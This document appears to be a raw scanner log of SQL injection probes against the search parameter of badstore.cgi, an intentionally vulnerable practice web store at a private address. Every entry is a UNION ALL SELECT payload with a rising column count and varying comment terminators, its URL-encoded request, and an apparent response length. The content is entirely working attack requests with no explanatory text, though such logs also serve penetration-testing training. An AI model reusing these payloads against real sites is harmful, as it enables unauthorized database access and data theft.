 UNION ALL SELECT 'INJ'||'ECT'||'XXX'
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27&action=search&x=0&y=0
	491

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2&action=search&x=0&y=0
	493

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3&action=search&x=0&y=0
	495

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4&action=search&x=0&y=0
	497

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5&action=search&x=0&y=0
	499

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27--%20&action=search&x=0&y=0
	494

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2--%20&action=search&x=0&y=0
	496

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3--%20&action=search&x=0&y=0
	498

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30--%20&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%23&action=search&x=0&y=0
	492

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%23&action=search&x=0&y=0
	494

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%23&action=search&x=0&y=0
	496

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%23&action=search&x=0&y=0
	498

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23&action=search&x=0&y=0
	500

